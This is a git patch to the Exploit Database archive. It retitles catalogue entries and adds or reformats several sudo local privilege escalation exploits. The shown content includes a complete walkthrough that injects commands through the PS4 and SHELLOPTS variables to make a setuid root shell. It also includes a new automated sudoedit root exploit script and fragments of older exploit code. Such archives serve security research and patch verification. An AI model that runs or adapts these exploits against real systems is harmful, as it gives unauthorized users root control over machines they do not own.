From fe689417a1f8cf91991a8cc7525bdf9430213d9b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 13 Mar 2016 05:03:14 +0000 Subject: [PATCH] DB: 2016-03-13 1 new exploits --- files.csv | 24 +++---- platforms/bsd/local/1087.c | 6 +- platforms/linux/local/1310.txt | 104 +++++++++++++++--------------- platforms/linux/local/319.c | 6 +- platforms/multiple/local/11651.sh | 25 +++++++ 5 files changed, 95 insertions(+), 70 deletions(-) create mode 100755 platforms/multiple/local/11651.sh diff --git a/files.csv b/files.csv index 162469252..de647e732 100755 --- a/files.csv +++ b/files.csv @@ -298,7 +298,7 @@ id,file,description,date,author,platform,type,port 315,platforms/windows/remote/315.txt,"Microsoft Outlook Express Javascript Execution Vulnerability",2004-07-13,N/A,windows,remote,0 316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0 317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0 -319,platforms/linux/local/319.c,"sudo.bin NLSPATH Local Root Exploit",1996-02-13,_Phantom_,linux,local,0 +319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Local Root Exploit",1996-02-13,_Phantom_,linux,local,0 320,platforms/linux/local/320.pl,"suid_perl 5.001 Vulnerability",1996-06-01,"Jon Lewis",linux,local,0 321,platforms/multiple/local/321.c,"BSD & Linux - umount Local Root Exploit",1996-08-13,bloodmask,multiple,local,0 322,platforms/linux/local/322.c,"Xt Library Local Root Command Execution Exploit",1996-08-24,"b0z0 bra1n",linux,local,0 @@ -895,7 +895,7 @@ id,file,description,date,author,platform,type,port 1084,platforms/php/webapps/1084.pl,"xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit (3)",2005-07-04,"Mike Rifone",php,webapps,0 1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0 1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure Exploit",2005-07-04,Kozan,windows,local,0 -1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 - 1.6.8p Pathname Validation Local Root Exploit (openbsd)",2005-07-04,RusH,bsd,local,0 +1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 - 1.6.8p - Pathname Validation Local Root Exploit (OpenBSD)",2005-07-04,RusH,bsd,local,0 1088,platforms/php/webapps/1088.pl,"Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0 1089,platforms/windows/remote/1089.c,"Mozilla FireFox <= 1.0.1 - Remote GIF Heap Overflow Exploit",2005-07-05,darkeagle,windows,remote,0 1090,platforms/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service Exploit",2005-07-06,basher13,windows,dos,0 @@ -1089,7 +1089,7 @@ id,file,description,date,author,platform,type,port 1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 SQL Injection / Command Execution Exploit",2005-11-07,rgod,php,webapps,0 1299,platforms/linux/local/1299.sh,"SuSE Linux <= 9.3 / 10 - (chfn) Local Root Privilege Escalation Exploit",2005-11-08,Hunger,linux,local,0 1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Local Root Exploit",2005-11-09,"Charles Stevenson",linux,local,0 -1310,platforms/linux/local/1310.txt,"Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0 +1310,platforms/linux/local/1310.txt,"Sudo <= 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0 1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure Exploit",2005-11-09,kingcope,bsd,local,0 1312,platforms/php/webapps/1312.php,"Moodle <= 1.6dev SQL Injection / Command Execution Exploit",2005-11-10,rgod,php,webapps,0 1313,platforms/windows/remote/1313.c,"Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0 @@ -10658,7 +10658,7 @@ id,file,description,date,author,platform,type,port 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php - (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 -11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0 +11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus _V4.rgo_ (id) news.php - SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0 @@ -13633,7 +13633,7 @@ id,file,description,date,author,platform,type,port 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0 15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0 15699,platforms/php/webapps/15699.txt,"PhpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80 -15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 +15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation (Full Nelson)",2010-12-07,"Dan Rosenberg",linux,local,0 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0 @@ -18203,7 +18203,7 @@ id,file,description,date,author,platform,type,port 20898,platforms/linux/local/20898.sh,"RedHat 6.1/6.2/7.0/7.1 - Man Cache File Creation Vulnerability",2001-05-18,jenggo,linux,local,0 20899,platforms/windows/remote/20899.txt,"Microsoft Outlook 97/98/2000/4/5 Address Book Spoofing Vulnerability",2001-06-05,3APA3A,windows,remote,0 20900,platforms/linux/local/20900.txt,"Exim 3.x Format String Vulnerability",2001-06-06,"Megyer Laszlo",linux,local,0 -20901,platforms/linux/local/20901.c,"Sudo 1.5/1.6 Heap Corruption Vulnerability",2001-02-22,MaXX,linux,local,0 +20901,platforms/linux/local/20901.c,"Sudo 1.5/1.6 - Heap Corruption Vulnerability",2001-02-22,MaXX,linux,local,0 20902,platforms/linux/remote/20902.c,"PKCrew TIAtunnel 0.9 alpha2 - Authentication Mechanism Buffer Overflow Vulnerability",2001-06-05,qitest1,linux,remote,0 20903,platforms/windows/remote/20903.html,"Microsoft Internet Explorer 5.5 File Disclosure Vulnerability",2001-03-31,"Georgi Guninski",windows,remote,0 20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0 @@ -18513,7 +18513,7 @@ id,file,description,date,author,platform,type,port 21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service Vulnerability",2012-09-10,halfdog,lin_x86-64,dos,0 21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability",2002-01-14,aT4r,windows,remote,0 21226,platforms/linux/local/21226.c,"IMLib2 Home Environment Variable Buffer Overflow Vulnerability",2002-01-13,"Charles Stevenson",linux,local,0 -21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 Unclean Environment Variable Root Program Execution Vulnerability",2002-01-14,"Charles Stevenson",linux,local,0 +21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Root Program Execution Vulnerability",2002-01-14,"Charles Stevenson",linux,local,0 21228,platforms/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service Vulnerability",2002-02-06,"Tamer Sahin",windows,dos,0 21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow Vulnerability",2002-01-16,"SuSE Security",linux,local,0 21230,platforms/php/webapps/21230.txt,"PHPNuke 4.x/5.x - Remote Arbitrary File Include Vulnerability",2002-01-16,"Handle Nopman",php,webapps,0 @@ -18698,7 +18698,7 @@ id,file,description,date,author,platform,type,port 21416,platforms/windows/dos/21416.txt,"Microsoft Internet Explorer 5/6 - Recursive JavaScript Event Denial of Service Vulnerability",2002-04-24,"Berend-Jan Wever",windows,dos,0 21417,platforms/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem Auth Bypass",2012-09-20,"Glafkos Charalambous ",hardware,webapps,0 21418,platforms/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion Vulnerability",2012-09-20,L0n3ly-H34rT,php,webapps,0 -21420,platforms/linux/local/21420.c,"Sudo 1.6.x Password Prompt Heap Overflow Vulnerability",2001-11-01,MaXX,linux,local,0 +21420,platforms/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow Vulnerability",2001-11-01,MaXX,linux,local,0 21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x Login Bypass Vulnerability",2002-04-25,"Ulf Harnhammar",php,webapps,0 21422,platforms/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting Vulnerability",2002-04-25,frog,linux,remote,0 21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 Image Tag Script Injection Vulnerability",2002-04-25,frog,php,webapps,0 @@ -21770,7 +21770,7 @@ id,file,description,date,author,platform,type,port 24603,platforms/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps,0 24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 Down.ASP HTTP Response Splitting Vulnerability",2004-09-16,"Maestro De-Seguridad",asp,webapps,0 24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability",2004-09-16,"Jason Summers",windows,dos,0 -24606,platforms/linux/local/24606.c,"Sudo 1.6.8 Information Disclosure Vulnerability",2004-09-18,"Rosiello Security",linux,local,0 +24606,platforms/linux/local/24606.c,"Sudo 1.6.8 - Information Disclosure Vulnerability",2004-09-18,"Rosiello Security",linux,local,0 24607,platforms/windows/remote/24607.txt,"Google Toolbar 1.1.x About.HTML HTML Injection Vulnerability",2004-09-17,ViperSV,windows,remote,0 24608,platforms/osx/local/24608.txt,"MacOSXLabs RsyncX 2.1 - Local Privilege Escalation Vulnerability",2004-09-17,"Matt Johnston",osx,local,0 24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 Insecure Temporary File Creation Vulnerability",2004-09-17,"Matt Johnston",osx,local,0 @@ -23630,7 +23630,7 @@ id,file,description,date,author,platform,type,port 26495,platforms/windows/remote/26495.py,"PCMan's FTP Server 2.0 - Remote Buffer Overflow Exploit",2013-06-30,Chako,windows,remote,0 26496,platforms/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080 26497,platforms/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer RM File Remote Stack Based Buffer Overflow Vulnerability",2005-11-10,nolimit,windows,remote,0 -26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x Environment Variable Handling Security Bypass Vulnerability",2005-11-11,"Charles Morris",linux,local,0 +26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass Vulnerability",2005-11-11,"Charles Morris",linux,local,0 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0 26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 Download.PHP File Parameter SQL Injection Vulnerability",2005-11-12,A.1.M,php,webapps,0 26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 Admin Control Panel Username SQL Injection Vulnerability",2005-11-12,bhs_team,php,webapps,0 @@ -24187,7 +24187,7 @@ id,file,description,date,author,platform,type,port 27053,platforms/php/webapps/27053.txt,"Venom Board Post.PHP3 - Multiple SQL Injection Vulnerabilities",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95-2004 Malformed Graphic File Code Execution Vulnerability",2006-01-09,ad@heapoverflow.com,windows,dos,0 -27056,platforms/linux/local/27056.pl,"Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (1)",2006-01-09,"Breno Silva Pinto",linux,local,0 +27056,platforms/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass Vulnerability (1)",2006-01-09,"Breno Silva Pinto",linux,local,0 27057,platforms/linux/local/27057.py,"Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (2)",2006-01-09,"Breno Silva Pinto",linux,local,0 27058,platforms/php/webapps/27058.txt,"PHPNuke 7.7 EV Search Module SQL Injection Vulnerability",2006-01-09,Lostmon,php,webapps,0 27059,platforms/php/webapps/27059.txt,"Xoops Pool Module IMG Tag HTML Injection Vulnerability",2006-01-09,night_warrior771,php,webapps,0 @@ -25051,7 +25051,7 @@ id,file,description,date,author,platform,type,port 27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,metasploit,php,remote,0 27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0 27943,platforms/windows/remote/27943.txt,"Oracle Java ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote,0 -27944,platforms/osx/local/27944.rb,"Mac OS X Sudo Password Bypass",2013-08-29,metasploit,osx,local,0 +27944,platforms/osx/local/27944.rb,"Mac OS X - Sudo Password Bypass",2013-08-29,metasploit,osx,local,0 27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting Vulnerability",2006-06-02,The_BeKiR,asp,webapps,0 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 diff --git a/platforms/bsd/local/1087.c b/platforms/bsd/local/1087.c index eb8307995..b6cd20c8c 100755 --- a/platforms/bsd/local/1087.c +++ b/platforms/bsd/local/1087.c @@ -67,6 +67,6 @@ snprintf(path, BUFSIZ/2, "%s /tmp/%s", SUDO, argv[2]); system((char *)path); } } -} - -// milw0rm.com [2005-07-04] +} + +// milw0rm.com [2005-07-04] diff --git a/platforms/linux/local/1310.txt b/platforms/linux/local/1310.txt index eac964b97..70c1f4acb 100755 --- a/platforms/linux/local/1310.txt +++ b/platforms/linux/local/1310.txt @@ -1,52 +1,52 @@ -## Sudo local root escalation privilege ## -## vuln versions : sudo < 1.6.8p10 -## by breno - -## You need sudo access execution for some bash script ## -## Use csh shell to change SHELLOPTS env ## - -ie: - %cat x.sh - #!/bin/bash -x - - echo "Getting root!!" - % -## - -## - # cat /etc/sudoers - ... - breno ALL=(ALL) /home/breno/x.sh - .. - # - -## Let's use an egg shell :) - %cat egg.c - -#include - - int main() - { - setuid(0); - system("/bin/sh"); -} -% - -% gcc -o egg egg.c -% setenv SHELLOPTS xtrace -% setenv PS4 '$(chown root:root egg)' -% sudo ./x.sh -echo Getting root!! -Getting root!! -% ls -lisa egg -1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg -% setenv PS4 '$(chmod +s egg)' -% sudo ./x.sh -echo Getting root!! -Getting root!! -% ./egg -sh-3.00# id -uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno) -sh-3.00# - -# milw0rm.com [2005-11-09] +## Sudo local root escalation privilege ## +## vuln versions : sudo < 1.6.8p10 +## by breno + +## You need sudo access execution for some bash script ## +## Use csh shell to change SHELLOPTS env ## + +ie: + %cat x.sh + #!/bin/bash -x + + echo "Getting root!!" + % +## + +## + # cat /etc/sudoers + ... + breno ALL=(ALL) /home/breno/x.sh + .. + # + +## Let's use an egg shell :) + %cat egg.c + +#include + + int main() + { + setuid(0); + system("/bin/sh"); +} +% + +% gcc -o egg egg.c +% setenv SHELLOPTS xtrace +% setenv PS4 '$(chown root:root egg)' +% sudo ./x.sh +echo Getting root!! +Getting root!! +% ls -lisa egg +1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg +% setenv PS4 '$(chmod +s egg)' +% sudo ./x.sh +echo Getting root!! +Getting root!! +% ./egg +sh-3.00# id +uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno) +sh-3.00# + +# milw0rm.com [2005-11-09] diff --git a/platforms/linux/local/319.c b/platforms/linux/local/319.c index 23b497c83..3acf56086 100755 --- a/platforms/linux/local/319.c +++ b/platforms/linux/local/319.c @@ -57,6 +57,6 @@ main(int argc, char **argv) execl(PATH_SUDO, "sudo.bin","bash", NULL); } - - -// milw0rm.com [1996-02-13] + + +// milw0rm.com [1996-02-13] diff --git a/platforms/multiple/local/11651.sh b/platforms/multiple/local/11651.sh new file mode 100755 index 000000000..3649f5ea7 --- /dev/null +++ b/platforms/multiple/local/11651.sh @@ -0,0 +1,25 @@ +#!/bin/sh +# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 +# local root exploit +# March 2010 +# automated by kingcope +# Full Credits to Slouching +echo Tod Miller Sudo local root exploit +echo by Slouching +echo automated by kingcope +if [ $# != 1 ] +then +echo "usage: ./sudoxpl.sh " +exit +fi +cd /tmp +cat > sudoedit << _EOF +#!/bin/sh +echo ALEX-ALEX +su +/bin/su +/usr/bin/su +_EOF +chmod a+x ./sudoedit +sudo ./sudoedit $1 +